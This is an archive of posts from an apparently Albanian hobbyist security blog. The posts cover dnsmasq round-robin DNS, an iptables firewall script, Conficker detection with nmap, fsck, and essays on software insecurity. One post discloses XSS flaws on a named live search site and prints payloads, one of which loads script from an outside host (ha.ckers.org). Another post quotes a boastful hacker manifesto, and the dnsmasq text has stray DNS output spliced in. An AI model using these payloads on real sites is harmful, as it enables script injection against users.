dnsmasq round-robin how to

Dnsmasq is currently compiled with round – robin algorithm (or a simple implementation of this algorithm). We make use of this capability for an very simple load balancing technique.
What dnsmasq & round robin do? Basically , we configure 1 host and give for him N° IP addresses , dnsmasq changes the IP order of this IP corresponding to one host after any single DNS request.
Whats the point?
After each new connection the IP responding will be the next in the list , doing so the requests will be balanced on 3 different servers managing 1 domain.
Let’s say we have a very big host called blackbox and for not bombing our host and the load we just add 3-5 or N servers for balancing the load of the server.

We give to our linux router/firewall an configuration like:
cat /etc/hosts
#
# /etc/hosts: static lookup table for host names
#

#<ip-address>    <hostname.domain.org>    <hostname>
127.0.0.1        localhost.localdomain    localhost darkinet
192.168.0.150 blackbox
192.168.0.151 blackbox
192.168.0.152 blackbox
#NOTE: In real life this should be something like blackbox.com with an public IP address.
#192.168.1.200           www.google.com   #I added google before lol 😀
# End of file

Ok, this is good, now lets see our simple configuration at work:
If we just $dig blackbox

;; ANSWER SECTION:
blackbox.		0	IN	A	192.168.0.150
blackbox.		0	IN	A	192.168.0.151
blackbox.		0	IN	A	192.168.0.152

The seccond response

;; ANSWER SECTION:
blackbox.		0	IN	A	192.168.0.151
blackbox.		0	IN	A	192.168.0.152
blackbox.		0	IN	A	192.168.0.150

The third response

;; ANSWER SECTION:
blackbox.		0	IN	A	192.168.0.152
blackbox.		0	IN	A	192.168.0.150
blackbox.		0	IN	A	192.168.0.151

So, we see that the order of the IP changes after each DNS request cyclically.
Then we restart dnsmasq
# /etc/init.d/dnsmasq restart

This is not for serious load balancing (yep it costs up to 4000 bucks or even more)
So in conclusion, if you are not

;; ADDITIONAL SECTION:
ns1.google.com.        329163    IN    A    216.239.32.10
ns2.google.com.        327587    IN    A    216.239.34.10
ns3.google.com.        331744    IN    A    216.239.36.10
ns4.google.com.        331744    IN    A    216.239.38.10

And you don’t have the need to use 4 server farms for a domain, than this may be your case.
Bye.

AW iptables firewall bash script 1.0 personal edition

Hi there,

Update, now bug fix release 1.1, the firewall was to restrictive and doesn’t allow fast internet browsint, fixed :)

First of all , from now on this website will be in english language, if some one from the staff wold like to translate, i can add a subdomain with a new installation of wordpress.
So, this is a simple bash script which creates  an stateful iptables firewall designed for blocking most common attacks at layer 3 & for on personal box’s.[not for gateways]
Implemented:
# a) Static rule based policies (not to be confused with a “static firewall”)
# b) Connection based stateful policies
# c) Sanity based policies
I have tested it and it blocks most nmap port-scans, syn floods, spoofing attacks and filter all ports , even open ones if the nmap sends more than 1 packet /s (very normal). I wanted to block also IPV6 traffic.
Here is the link ,
Enjoy:

http://albanianwizard.org/Postokodin/67

Save it as firewall.sh than execute it as root with sh firewall.sh and it will print the rules :)
GPLv3.

AW01 Linux E-zine jasht.

Pershendetje, u be kohe qe nuk po shkruaj dhe realisht nuk kam pasur aspak kohe per shkak te punes dhe impenjimeve te tjera.

Kam kenaqesine te ndaj me ju versionin e pare te E-zine-s AW (AlbanianWizard) ku do te gjeni nje cheat-sheet per perdorimin e perditshem Linux gjithmon per perdoruesa te nje niveli fillestar\mesatar, meqenese jemi ne shqiperi po e çojm mesatar :(

SQARIM: AlbanianWizard nuk jam une siç mund te jene keqkuptuar disa, un jam Arditi dhe jam thjesht nje i apasionuar mbas Informatikes ne pergjithesi, qellimi per te cilin kjo faqe eshte quajtur AlbanianWizard eshte per shkak te nje grupi te vjeter qe nuk eshte as koha e as vendi te flitet.
PS – kam pare shume postime te cilat kane qene spam, te cilat jane fshire.
Qe postimi juaj te pranohet ketu duhet qe :
Te perdorni nje email real
Te perdorni emrin tuaj real (ose te pakten nje serioz)
Te mos beni spam
Te mos flisni budallalliqe/genjeshtra.

Uroj qe tju pelqej, ose me sakt jam i sigurt qe do u pelqej.
Eshte goxha teknike keshtu qe ecni disi me intuit 😉

http://albanianwizard.org/3z1n3s/aw01.txt

Timmp.com – Motorri i ri i kerkimit (IT’S HACKED UP)

Emmmmm , eshte pak jo e hijshme qe te flas per kete, porse gjithsesi po shkruaj disa gjera…
Me vjen keq qe me bie perhere mua te flas per problemet :(

Ky eshte nje motorr kerkimi i krijuar nga nje shqiptar, dhe kur e mora vesh lajmin u gezova shume, edhe pse ka me shume rezultate se google ,  pra eshte pune goxha serioze dhe eshte krenari per ne qe te bejm gjera te tilla, dhe nga ana tjeter uroj qe te kete sa me shume shqiptar te tille. Rastesisht duke povuar disa terma kerkimi hasa ne nje gabim:

http://www.timmp.com/index.php/search/q/all/el8

Siç e shohim motorri eshte i ndertuar ne php, dhe kjo me beri te mendoja per vulns,
Nuk duhet shume per te arritur ne rendimin e serverit dhe problemeve te tij,

http://www.timmp.com/index.php/search/q/all/%3cimg+src%3d%22jav%26%23×09%3bascript%3aalert(‘ALERT’)%3b%22%3e

Dikush qe une nuk e di sepse u mora me kete pune vetem 5 min, ke perfituar nga ky vulnerabilitet dhe ka hackuar faqen duke arritur te modifikoj edhe query.t e kerkimit.
Per konfirmim, shkoni tek http://www.timmp.com dhe kerkoni me kete kriter kerkimi:

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

Mesazhet qe paraqiten nuk jane shokuese, dikush duhet te mendonte para edhe per sigurine e faqes, faqa ne kete moment eshte e penetruar dhe me sa duket askush nuk eshte shqetesuar.
Te jesh konkurrent sot ne tregun e eger IT, do te thote qe duhet te presesh edhe sulme, qofte edhe nga administratoret e google, kujt do ti pelqente ti iknin miliona vetem se nje 20 vjeçar shkruan nje motorr kerkimi me me shume rezultate se sa vet gogòli?
Ju bej thirrje lexuesve qe te reportojn tek administratori i faqes keto probleme, tek faqa mund te egzekutohen edhe skripte te jashtme qe ndodhen ne faqe te huaja, psh <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> po ta provoni skripti do te egzekutohet ne faqe.
Te gjithe duhet ti çojm email dhe linkoni postimin ne menyre qe te kete me shume sqarime, dhe te besoj vertet qe faqa nuk eshte me e tij.

Tung tung ..

c0d1ng hoR30R

Kam shume kohe qe nuk shkruaj, dhe shpresoj se do rrij me shume pa shkruajtur deri tek tema e ardhshme, por besoj se kjo qe po shkruhet tani ja vlen pritjen edhe 2 vjet :).
Meqenese eshte keshtu, ja ku e kemi nje teme qe i vetmi vend ku nuk eshte tabu te flitet eshte undergroundi.
Profesioni i dyte me i vjeter eshte lufta, por edhe lufta ka zhvillimet e saj dhe sot kemi IW (Information Warrior), per te hyre ne teme po bejm menjehere disa afirmime ne menyre qe te hapen syte dhe une te kursej rreshta fjalesh (isha duke thene kodi :P).
Jemi ne fushen e informatikes, dhe meqenese jemi ne kete fushe , nuk lejohen devijime nga e verteta qoft edhe me 1 bit sepse kjo do te sillte jofunksionim te plote (siç do te shihet me poshte), keshtu qe ç’do gje qe do lexoni eshte 100% e vertete, dhe 100% e vertetueshme per ata qe duan te kerkojn argumentet per secilen nga frazat e meposhtme:

*Me shume se 3000 kompani ne kete moment jane te infiltruara nga hackerat, ç’do institucion ka siguri te thyer dhe hane exploite (thyhen) ç’do dite nga hackerat.
* Firewallet, IDS , Anti-Viruset nuk punojn aspak mire, shumica e atyre qe i shesin keto produkte kane nje mentalitet “klasik te sigurise” dhe fokusohen tek Network Security nderkohe qe duhet te fokusohen tek Software Security.
* Shumica e makinave ne internet mund te thyhen NE KETE MOMENT (perfshire makinen ku eshte i hostuar ky sit), pa perjashtuar ketu ato me programet dhe sistemet me “up – to – date” kjo sepse ne kete moment egzistojn mijera exploite te quajtura “0-day” qe eshte shume e mundur qe te qendrojn te pa zbuluara per vite me radhe, gjithashtu shume qe jane publike nuk jane ende te rregulluara si probleme.
* Nje hacker serioz mund te futet ne makinen tende ne kete moment, edhe nese ti ke nje imazh sistemmi\backup apo ç’fare do lloj metode per te rikthyer sistemin kjo nuk do e ndihmoj pasi nje “serioz” mund te infektoj pa frik firmwarin e makines, qe do i bente keto tentativa “pastrimi” jo efektive. Kjo edhe sepse nje i tille mban me vete gjithmon nje arsenal qe nuk e ndan me te tjeret, (you know) per ditet e veshtira, si i thone, “mbaje ta kesh me vete, si dihet rruges”.

Tani po thoni “WoW” ç’fare po thot ky, … nuk po e marr vesh, ku do me dal daje? Per ta bere me shume kurioz, po permend disa fakte:

– Nasa humbi 165 milion $ kur Shatelli  per ne Mars u rrezua, kjo per shkak te nje problemi ishte nje bug ne perkthimin midis anglishtes dhe njesive te llogaritjes (shume banal) qe rezultoi me gabim ne llogaritjen e trajektorjes qe rezultoj ne nje perplasje.

– Nje anije ushtarake amerikane , leshoi nje rrakete dhe shkaterroi nje avion pasagjeresh (Airbus A320) duke e mare per nje avion ushtarak. U.S ja hodhi fain programit ushtarak.

– Virusi i njohur “LOVE BUG” shkaktoi biliona deme, kjo per shkak te nje gabimi ne design te microsoft outlook i cili lejonte egzekutimin e kodit te jashtem, realisht shumica e viruseve perdorin probleme sigurie te kodit dhe jo te networkut per te bere ate qe duhet te bejn.

Virusi qe po flisnim 2 tema me pare, eshte edhe ai fakt i kesaj gjullurdie qe flitet.

E pse nuk kam degjuar une o Ardit nga keto qe po shkruan?
Le te lexojm bashk kete histori te vogel..
Ata qe kane studiuar pak software engineering, dine se programi kalon disa etapa deri sa te quhet i perfunduar, dhe nga etapat me te rendesishme eshte edhe testimi per probleme me dizajn apo ne aplikimin e ketij dizajni, i cili eshte nder me te gjatet dhe nder me problematiket sepse hshpesh here ben qe te shkruhen programet nga 0, dhe muaj te tere te shkojn ne kosh :)
Vazhdon historia.., E kemi vene re, qe sapo Apple nxjerr nje version te ri sistemi operativ, Microsoft hidhet edhe ai ne sulm dhe e nxjerr sistemin e vet para dates se caktuar, apo kur dikush nxjerr nje version te ri te programit apo funksione te reja edhe konkurrenti i tij menjehere do e nxjerri diçka te tille.
Dhe programatoret e shkret u kerkohen programe te medha dhe kur pyesin “kur te duhet i perfunduar?” shefi u pergjigjet me “dje!”.
Kjo sepse kemi te bejm me ekonomi tregu, dhe shefat zakonisht preferojn (shpesh te detyruar nga kushtet e egra te xhungles) te marrin leket ne moment se sa te humbin bleresat dhe te ngelen me nje program (relativisht te sigurt) por me pak bleres per shkak te voneses dhe mbizoterimit te tregut nga konkurrenca.
Nga kjo nxjerrim se tregu sot i programeve eshte parajsa e intruderave, me treshen e rendesishme qe vjen e forcohet:
Kompleksiteti Microsoft word ne fillim ka pasur vetem 15000 rreshta kod ndersa ne 95 pati 2000000 ndersa sot 10’000’000 kjo per nje hacker do te thote “njam njam njam”.
Pse , sipas llogaritjeve ne 1 KLOC (njesi matjeje per sasine e kodit) mund te kete nga 5 bug deri ne 50 bugzzzz dhe ky eshte ligj universal. Imagjinoni se sa mund te kete ne 1000000 KLOC? dhe ketu po flasim vetem per nje aplikacion, pa llogaritur aplikacionet e tjera, sistemin operativ, firmwaret, dhe edhe vet sistemet mbrojtese, antiviruset, firwallet….
Windows XP ka 40 milion KLOC, ndersa Windows 7 mendohet 120 milion. (pa programe te instaluara siper, vetem sistemi i fresket).
Dhe per “ata te sigurise” ligji eshte ligj, “me shume kod, me shume bugz”, besoj se tani e kuptoni frazen e çuditshme qe mund te keni hasur ne underground “keep it simple stupid”, e meqe ra fjala:

Ekstensibiliteti kjo eshte arsya kryesore e perhapjes se viruseve, sot programet nuk behen me kompakt si njehere e nje kohe, por sot kemi VM, plugine, shkurtimisht kode qe mund te perfshihen nga nje faqe e jashtme ne internet dhe te egzekutohen direkt ne makinen tende. Kjo eshte trend ne kete moment, dhe nese nje program nuk eshte i tille atehere nuk eshte i “mire”.Per me shume kerko ne google (nese nuk e di) per “Code Red”
dhe historine e tij me serverin e Microsoftit IIS
dhe pika e 3-te e “treshes e famshme” eshte:

Konektiviteti Ne momentin qe po shkruaj kete tem, kam hyre ne internet nepermjet iPhon-it me “internet tethering” dhe e kam lidhur me kompiuterin me USB. (Shih Settings>General> Network> Internet Tethering çoje On). dhe sot siç shkruhet tek “THE TCP-IP GUIDE” eshte e veshtire te mbash 2 aparate elektronike jo te lidhur me njeri tjetrin, kjo ka krijuar mundesine e sulmeve te automatizuara, pra ne momentin qe nje virus apo nje sulmues infekton nje range ip-sh shikon per te tjera, dhe per ta ber kete i duhet vetem nje skanim.

Rrenja e Problemit.

Vetem nje fjale, BUFFER OVERFLOW, aplikacione qe te lejojn te egzekutosh aplikacionin tend ne nje sistem te caktuar, ku ka me mire, vulnerabiliteti qe te lejon diçka te till te lejon kontroll te plote mbi sistemin.
Kjo eshte arsyeja qe e gjithe ajo qe eshte shkruajtur me siper po ndodh, dhe mbrojtja ndaj ketij lloj sulmi eshte shume minimale per te mos thene jo-egzistuese, pasi edhe nese keni firewall, antivirus, apo IDS ai do te monitoroj gjera “standarte” siç u tha ne fillim, psh ç’faj ka firewalli nese ti duke vizituar me internet explorer nje faqe interneti kthehesh ne nje zombie (kompiuteri yt, jo ti) , kodi kalon ne menyre legjitime dhe nese firewalli bllokon porten atehere nuk ka me internet dhe ti s’ke mundesi te lundrosh, e njejta gje me anti-viruset te cilet nuk jane te pergjegjshem nese me ane te nje aplikacioni (te besuar) egzekutohet kod (qe zakonisht mund te jete i maskuar dhe mund te duket normal) nga ky aplikacion dhe sistemi kompromentohet.
Nga keto kuptuam se mbrojtja kunder ketyre lloj sulmesh eshte shume e veshtire, kjo per disa arsye:
1) Nuk mund te monitorohet i gjithe kodi i te gjitha aplikacioneve, edhe nese behet nga ta dalloj sistemi mbrojtes qe ai kod i caktuar eshte kod keqberes dhe jo kod qe po e egzekuton programi? (po mendon tani per Snort dhe db e tij te firmave te shellkodeve dhe exploiteve te ndryshme) edhe nese do te kishte fatin te kapte nje te tille (ne rastin se sulmuesi po perdor diçka te gjetur rrugeve dhe jo te koduar vet [rast fillestaresh] nuk do te ishte ne gjendje ta ndalonte).
2) Sistemet e sigurise sot, maksimumi qe mund te bejn eshte te lajmerojn per nje sulm te till por jo ta parandalojn, (shume te pakt jane ata qe mund ta bejn).
3) Keto lloj vulnerabilitetesh kane te bejn me programatorin me shume se sa me vet programin, keshtu qe nuk ka diçka standarte, eshte gjithmon problem qe mund te ndodhet kudo ne 30000 rreshtat e kodit qe mund te kete shkruajtur dikush. Fakt per kete qe thash, provo te kerkosh ne google me “buffer overflow vulnerability scanner” dhe shiko rezultatet, asnje aplikacion per te bere diçka te tille, nderkohe qe kerko me “port scanner” apo “vulnerability scanner” dhe shiko listen se ku perfundon. Kjo eshte fakteqesi.
4) Tendenca per te nxjerr programet sa me shpejt, e ben kete problem gjithmone e me kritik, keshtu qe mendoni pak per programet gjysem te perfunduara ku edhe per ate qe jane programuar nuk e bejn plotesisht, ç’fare impakti ne nivelin e sigurise mund te kene ato ne nje sistem?
Vetem nje fjale: FATAL.

Si pasoje e ligjit te BUG-eve , dhe si pasoje e arsyeve qe u listuan me siper, ato qe u thane ne fillim te kesaj teme jane plotesisht te verteta, dhe nuk kane egzagjeruar ata qe thane “nje sistem i sigurt eshte nje sistem i fikur, i mbyllur ne nje burg te siguris maksimale i rrethuar me roje te armatosur me shot-gun”.
Mbas kesaj, mund te kuptoni fraza te tilla qe mund te gjenden tek zfo05 (kerkoje se eshte postuar ne kete blog)

“Apologies for the poor quality of the hacklog, but I’m old now and let’s face
it, Kevin Mitnick is done. You can move your box anywhere Kevin, we’ll find you
and own you. You should know best, it’s the “hacker” in us – or something like
that…See you soon.” — ky ishte mesazhi i lene nga profesionist “Kevin Mitnickut” te madh, “HACKERIT” legjendar, bytw FU** Y*U Kev.

Per ta perfunduar:

_____________________________________
Between us and people we know, everything is owned. We keep owning shit that
others have, they own some shit we already have. We don’t exactly hire
secretaries to sort this out.

We’re colonizing the internet the way Europe colonized Africa, cutting it up
into little pieces. We have your accounts, your mail, your dev box, your host,
and your ISP. Code exec on your lappy if we think it’s worth the hassle. We
have so much shit owned we can’t manage, or even remember, half of it
. Targets
pop up and we have to ask ourselves if we already have it, because we just don’t know.

We could set up franchises like McDonalds, one on every corner of the net, over
99 billion served. Supplying you with artery-clogging hax morning afternoon and
night.

We need some goddamn staff, we’re a billion dollar enterprise running on a
lemonade stand budget. If there was much useful help out there, we’d hand out
root passes like candy on hallowe’en. That’s just a pipe dream, we just find
more people we can’t trust. Anyone useful is as busy as we are. Thank your
lucky stars we ramble on.
____________________________________________________

Ky eshte realiteti.
Mire, dikush (supersticioz) eshte duke pyetur veten e tij, per arsyen qe me shtyu te shkruaja kete…
Faktikisht jane shume arsye..
a) Me pelqen e verteta, dhe me pelqen te demaskoj te paverteten, sidomos kur shemb iluzione. (kjo per te bere te kuptohet qe ajo qe shitet sot me emrin “siguri” eshte fraze boshe, dhe te flasesh kete qe eshte shkruajtur ketu eshte tabu sepse biznese te tera bazohen ne keto iluzione).
b) Materiali eshte shume i mire per programatoret qe nuk duan te pushohen nga puna se programi per te cilin ke bere dark te madhe e ke festuar me miqt, 1 vit me vone ben qe kompania blerese te humbi 1’000’000$
c) Me pelqen :)

Conficker Worm

A keni degjuar ndonjeher per kete worm i cili vertitet neper internet kohet e fundit. Eshte nje nder me te rrezikshmit i cili ka bere te jene viktime miliona kompjutera qe nga viti 2003 me sisteme operimi windows.
Dhe e bukura eshte se ky worm u be i ditur vetem ne 2008. Ne 2009 u be e ditur qe ky worm kishte sulmuar mbi 15 milion kompjutera ne mbi 200 shtete te botes. Wormi fillimisht u perhap sipas LAN dhe me pas me ane te usb dhe network share. Ne janar wormi sulmoi Floten Detare Franceze e cila bllokoi dhe uljet e avioneve ne te pasi nuk arrinin dot te benin update planet e fluturimit. Ministria e mbrojtjes se Britanise se Madhe deklaroi qe shum nga kompjuterat desktop te saj ishin infektuar nga ky worm. Ne 2 shkurt 2009 Ministria e Mbrojtjes gjermane deklaroi gjithashtu qe qindra kompjutera te saj ishin infektuar nga Conficker.
Pra kemi te bejme me nje monster te vertete, prandaj une pata deshire te shkruaj kete teme per te palajmeruar te gjithe IT shqiptare per kete rrezik. Ketu do tju jap disa nga nga menyrat se si ky worm punon dhe si mund ta parandalojme dhe ta identifikojme.

Atehere wormi sulmos sic thame sistemet Windows dhe cili eshte nje nga pjeset me vulnerabel te ketyre sistemeve? NetBIOS pasi sic e dime ne kohe me ane te stack overflow dhe Buffer overflow qe ky ka mund te shtrytezojme menyra pa fund per te shperndare dicka nepermjet rrjetit.

-Ne nje rast worm ka shfrytezuar nje Remote Code Execution i cili ben te mundur ekzekutimin e nje komande apo aplikacioni per pa kerkuar te drejta autentikimi.
-Rasti II
Conficker B perdor te njejten gje por nese ky bug eshte mbyllur fillon me brute force pra provon pass dhe username me rradhe me ane te nje fjalori.

-Rasti III
Perdor usb apo krijon dll te cilat te ekzekutojne autorun.

-Rasti IV
Eshte nje menyre qe perdor Conficker D qe realisht akoma nuk eshte zbuluar.

P.S Nese dikush gjen source kodin ta postoj, po nuk besoj pasi ne keto momente ate vetem mund ta blesh pasi nuk e gjen gjekundi.

Per te vazhduar te infektoi Worm vazdhon keto procedura:
-Bllokon Dns LookUp
-C’aktivizon AutoUpdate
-C’aktivizon Safe Mode
-Dhe mbyll proceset e anti malwareve
-Me pas kontrollon qe keto jane mbyllur.
Worm synon proceset explorer.exe dhe services.exe dhe si perfundim eshte lidhet me ane te p2p te serverat .
Fale vegles me te mire per security nmap ne mund ta detektojme kete worm me ane te kesaj komande:

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args safe=1 [targetnetworks]
Pas ekzekutimit aplikacioni ju informon me nje mesazh qe komjuteri eshte i infektuar apo jo.
Pra sic shohim te sulmuara jane portat 139 dhe 445.

Ndersa per nje analize me te detajuar te worm do ta gjeni ketu:
http://www.honeynet.org/files/KYE-Conficker.pdf
e shkruajtur nga gjenia Dan Kaminsky.

Linux Ubuntu komanda fsck

Pershendetje, kam kohe qe nuk kam shkruar ne blog pasi kam qene shum i zene. Sot do te trajtoj nje teme e cila mendoj se mund te jete e nevojshme per cdo perdorues jo ekspert te linux. Atehere para ca ditesh me doli nje problem me ubuntu me te cilin punoj ne pune pasi pati nje nderprerje dritash dhe une isha duke kryer nje proces kur e rinis sistemin perseri shoh qe sistemi nuk me hapej me. Sistemi me kerkonte nje check disk e lash dy here ta bente dhe sistemi perseri nuk startonte por me dilte nje console per recover e cila te jepte mundesine te veproje me komandat. Duke pare errorin qe me dilte “filesystem error” mendova te perdor nje komande qe quhet :

fsck – check and repair a Linux file system

sic tregon dhe vete emri kjo komande kontrollon filet e sistemit dhe nese gjen gabime i korigjon. Pasi e ekzekutova komanden:

sudo fsck

kontrolli i sistemit filloj dhe me pas gjeti gabime, me pas me kerkoi ti korigjonte mjaftoj qe une ti jepja nje yes dhe cdo error korigjohej. Me pas bera nje restart dhe sistemi u kthye si me pare. Per te pare te gjitha komandat e fsck mjafton te shkruani ne bash:

man fsck

ose per me shume informacion keni kete link:

http://manpages.ubuntu.com/manpages/hardy/man8/fsck.8.html

Ja nje nga pergjigjet e pyetjeve pse te pelqen linux. Nese do te kishim Windows do te duhej te vendosnim diskun dhe ta lenim repair dhe nese gjithmone e bente do te shihnim qe shume programe nuk do te punonin. Imagjinoni sikur sistemi te ishte nje web apo mail server dhe te ishte windows sa kohe te kerkone per riparim ndersa nje linux nuk do te kerkonte me shume se 1 minute.

Paradoks ne Universitetet Shqiptare

Mund te thoni se me pelqen kritika, porse nuk eshte e vertet.
Me pelqen te them fjale te mira , te lavderoj por jo pa vend.
E pra kete teme po ja dedikojme pedagogeve tane te dashur (nese jane te tille).
E nga tja nisim :/ , eshte fjala per fakultetet e informatikes , per te tjerat qe nuk kam njohuri nuk mund te flas.
Shumica e atyre qe pergatisin sot “eliten” shqiptare te informatikes, inxhinieret e ardhshem ,
Specialistet e Sigurise, Programatoret, Administratoret,
Specialistet e rrjetit sistemeve operative etj …etj ..nuk kane mbaruar vet per Informatike!
SI?
Po po, nuk kane mbaruar as per informatike te pergjithshme te harrojm specializimet\masterat etj,
por kane mbaruar per Fizik ose Matematik!
A mund te me thoni se ç’lidhje ka pitagora me kriptografine rijndael?
A mund te me thoni se ç’lidhje ka Isak Newtoni me nje Stack Overflow apo
me nje proçesor qe ka arritur 100%?
Dhe gjithsesi mbeten PEDAGOGE apo jo?
Pedagoge vertet mbeten, por jo Informatike ama!
Nuk dua ti heq asnjerit meritat, mund te kene metode te shkelqyer mesimdhenie,
mund te jene shkenctaret e matematikes apo fizikes, por me Informatiken jane amator dhe
jo te Diplomuar, nese jane profesionist ku e kane diplomen?
Une kete teme po e shkruaj si i jashtem, pasi personalisht nuk kam studjuar ne shqiperi porse
shume te njohur me kane sinjalizuar per situaten aty, dhe e keqa eshte se
nga mosha qe kane nuk çohen dot as nga karrigja tju hapin vendin te rinjve (pleqeri hesapi)
qe me siguri jane shume here me lart se ata.
Gjendja eshte e deshperuar, shumica e studenteve edhe pse mbarojn
“per informatik” nuk dine te shkruajn nje program, nuk dine te ndertojn nje faqe te thjeshte ne html,
nuk dine te menaxhojn nje databaze e nuk dine se ç’fare eshte LINUX..
Me duket se u bene si  shume “nuk dine” …, e kur “nuk dine” atehere si i marrin keto provime?
Pergjigjen te dashur miq po ua leme atyre qe luftojn korrupsionin dhe pedagogeve qe perhapin kulturen
, kulture qe u shpalos ne menyre perfekte nga ish ministri i kultures-rinis-dhe sekseve.

Jam shume i hidheruar per te vazhduar akoma me temen, e ne te njejten kohe u them
KURAJO te gjithe atyre pedagogeve qe kane diplome informatike
dhe jane te specializuar per ate vend pune, gjithashtu dhe studenteve nje KURAJO e madhe!
Zgjohuni, jemi ne 2o1o nuk jemi ne kohen kur u hap normalja ne Elbasan.

Komunikimi ne Internet | Format Virtuale te Komunikimit

Ne temen Historia e Internetit trajtuam qellimet origjinale per te cilat u ideua “Inter-Network-u” dhe morem nje ide per ç’fare u ideua interneti dhe transformimi i perdorimit te tij ne kohet e mevonshme, ne kete teme do te shohim pikerisht qellimin ‘sot’ per te cilin perdoret interneti dhe metodat e ndryshme te ketij komunikimi.
Jemi te qarte qe interneti perdoret per te shkembyer informacion, qofte ky informacion i drejtuar nga nje grup perdoruesish tek tjetri, qofte informacion i drejtuar nga nje firme biznesi tek konsumatoret apo qofte dhe Informacion i Rrezikshem perdorimi i te cilit varet nga qellimi.

Keshtu qe dalim ne nje perfundim se Interneti eshte “Shtepia e Informacionit” dhe pikerisht per ta bere kete informacion sa me te leht per tu ndare dhe arritur eshte zhvilluar shkenca e komunikimit ne rrjet dhe normalisht dhe mjetet e komunikimit ku do permendim ato me te rendesishme duke evituar rendin kronologjik te tyre.

Zines dhe EZines jane nga format me te vjetra te komunikimit derivojn nga ‘magazines’ dhe jane lloj revistash online , zakonisht ne formate text ku ndahet informacion i shkruajtur nga grupe te caktuara te cilat zakonisht nuk kane si prirje ndarjen e madhe te informacionit por jane te drejtuar nje grupi te klasifikuar lexuesish, nje shembull te nje faqeje te tille mund ta shohim tek textfiles[dot]com , zakonisht eshte nje webserver qe pret lidhje ne porten 80 dhe vizitoret perdorin web-browser (firefox, opera, safari, links etj)

E-MAIL ose Internet Mail, edhe kjo nga format me te vjetra qe sot njihet me shume e zhvilluar ne formen e saj web-mail si psh hotmail, yahoo-mail, apo i preferuari Gmail qe kohet e fundit eshte default ne https, edhe ne kete rast client eshte si me siper web-browser kurse serveri ofron nje interface ‘user-friendly’ per perdoruesit. Gjithsesi forma tipike eshte nje email server  qe mund te perdori POP3, SMTP, IMAP si protokoll dhe clienti po ashtu. Si teknologji e njohur per sigurine dhe privacy gjate shkembimit te emaileve eshte GnuPG.

Mailing-Lista edhe kjo nje form goxha e vjeter e komunikimit ne internet ku me ane te nje programi psh GNU Mailman ku ne kete rast kemi nje program te shkruajtur ne python tek i cili regjistrohen perdoruesit dhe komunikimi behet ne baze te dergimit te emailve ku kur dergohet nje email nga nje perdorues emaili i shkon te gjithe grupit, dhe nga njera ane eshte goxha form e mire komunikimi dhe sot. Nderkohe qe shembuj ‘modern’ te ketyre kemi bugtraq, google groups etj.

IRC , ketu kemi te bejm me te ashtuquajturin “chat” ku ne kete rast kerkon nje server dhe nje client ku servera te njohur kemi freenode.net , efnet.org 😉 , fuNET, DALnet etj. Zakonisht perdor porten 6667 ku client si mIRC, Xchat, LostIRC, Irssi (modular, i thjesht dhe shume stabel) apo tashme dhe web-browsera si opera e kane te perfshire nje client IRC.
Kjo forme komunikimi e internetit, vjen me kanale dhe ne formen e komunikimit ne kohe reale midis perdoruesve duke ofruar ‘kanale’ ne te cilat perdoruesit flasin me njeri-tjetrin ne kohe reale. Kemi dhe forma te tjera te IRC-s si pershembull miBIT

WebFaqet – kjo eshte forma me e perhapur sot ku perfshihen forumet, blogjet (tani jeni duke perdorur nje te tille), portalet ne pergjithesi dhe mund te jene faqe te veçanta ku psh mund te shkruhen vetem papers, mund te ndahen programe apo mund te jene faqe per zhvillime projektesh,  faqe reklamuese te bizneseve te ndryshme, faqe me sherbime, faqe multimediale me video (youtube)  dhe foto  etj etj. Kjo eshte nje kategori shume e gjere e cila perfshin nje pjese te mire te asaj qe nga shumica quhet ‘internet’ nderkohe qe ne realitet eshte vetem nje pjese e vogel.

File Sharing – po e fusim dhe kete ne kete tek “mjetet e komunikimit” pasi edhe kjo eshte nje mjet ‘komunikimi’ nderkohe qe ndahet informacioni, nder me te njohurit ne kete fushe eshte torrent ku ne kete rast nuk ka server por secili eshte client dhe server ne te njejten kohe, ka nje protokoll te caktuar dhe eshte ideuar ashtu si p2p apo forma te tjera per te ndare informacionin.
Zakonisht perdoret per te ndare informacion jo te ligjshem ku thyhen te drejtat e autorit.

VOIP – ose Voice over IP u ideua fillimisht per tu dhene jete telefonatave nepermjet internetit, funksionon dhe ky me server\client dhe ka protokollin e vet , faqe te njohura qe ofrojn kete sherbim jane VoipStunt te cilat ofrojn dhe telefonata me shqiperine voip-diçka etj.

IM ose Instant Messaging , doh, ka nevoje per tu sqaruar? Messenger, yahoo messenger, ndonje web – messenger e keshtu me rradhe, edhe kjo ka protokollin e saj dhe funksionon ne formen client\server. Me ane te IM-ve psh aMSN Pidgin, Windows Live Messenger qe jane client qe ne kete rast lidhen me rrjetin MSN mund te komunikosh ne kohe reale edhe duke suportuar videon\audion perveç mesazheve te shkruara.

VideoKonferencat – nje tjeter form komunikimi e ideuar per te ndare audion dhe videon ne dy drejtime ne te njejten kohe, dhe kjo eshte nje tekonologji paksa me e komplikuar, gjithsesi :

Sot, realiteti eshte se te gjitha keto sherbime shume programues kompani po perpiqen qe ti sjellin si nje pakete AIO (all in one) duke u munduar te perfshijn te gjitha sherbimet ne 1.
Dhe shpesh i gjejm te perziera me njera-tjetren.

Te zgjerojm limitet e iptables

Jemi ne nje nga temat me * ketu ne albanianwizard.org, them me * sepse ky eshte nje koncept origjinal i patrajtuar me pare, koncepti eshte te kthejm Iptables firewall ne IPS (Intrusion Prevention System), dhe shkrimi eshte paksa i nje niveli te avancuar (kjo edhe pse jane koncepte te reja dhe jo diçka e perditshme) keshtu qe nese nuk  keni informacione se ç’fare jane:
buffer overflow
sql injection
CSS (XSS)
Local File Inclusion , RFI (remote file inclusion) dhe nuk keni te qarte –string te iptables atehere eshte me mire te kaloni ne teme tjeter pasi ne kete teme nuk do te sqarojm sulmet por metoden se si mund te “bllokohen” keto sulme, gje qe e kthen iptables ne nje IPS, por ky eshte thjesht nje koncept dhe shume sulme te alteruara mund te rezultonin te sukseshme edhe mbas metodave mbrojtese qe mund te aplikojm (e shohim me poshte), por kjo vetem ne rastet kur perdoret buffer overflow (stack\heap – overflow), ne rastet e tjera mbrojtja eshte shume efikase.

iptables VS buffer overflow
Sulmet me te rrezikshme sot, nuk jane ato qe i drejtohen sistemit, apo nje platforme por ato qe i drejtohen drejtpersedrejti vet aplikacionit ,  le te shohim sebashku dhe arsyen.
